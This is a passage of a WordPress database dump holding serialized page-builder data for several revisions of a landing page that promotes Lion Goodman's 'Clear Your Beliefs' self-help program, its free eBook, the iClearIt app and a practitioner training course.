world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1166, 1650, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:785:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1428:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li><big>Release pain and hurts from the past</big></li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2894:"<div id="divStroke"><h2 style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" data-wp-imgselect="1" />A Note from Lion Goodman</strong></h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1165, 1649, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:785:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1428:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li><big>Release pain and hurts from the past</big></li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2894:"<div id="divStroke"><h2 style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" data-wp-imgselect="1" />A Note from Lion Goodman</strong></h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1167, 1651, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:785:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1418:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – 